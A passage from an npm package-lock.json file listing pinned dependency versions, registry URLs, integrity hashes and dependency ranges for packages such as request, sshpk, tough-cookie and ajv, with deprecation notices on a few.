"sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { 
"version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": 
"sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": 
"sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", 
"integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", 
"resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { 
"version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", 
"dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": 
"sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": 
"https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": 